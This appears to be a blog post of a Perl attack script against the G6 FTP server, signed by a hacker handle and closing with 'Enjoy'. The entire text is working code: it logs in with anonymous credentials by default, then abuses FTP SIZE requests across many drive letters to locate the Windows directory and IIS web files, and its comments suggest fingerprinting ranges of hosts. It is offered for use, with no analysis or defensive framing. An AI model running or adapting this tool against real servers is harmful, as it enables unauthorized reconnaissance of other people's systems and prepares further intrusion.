# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE
/$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

comments: 0 » tags: ,
« Previous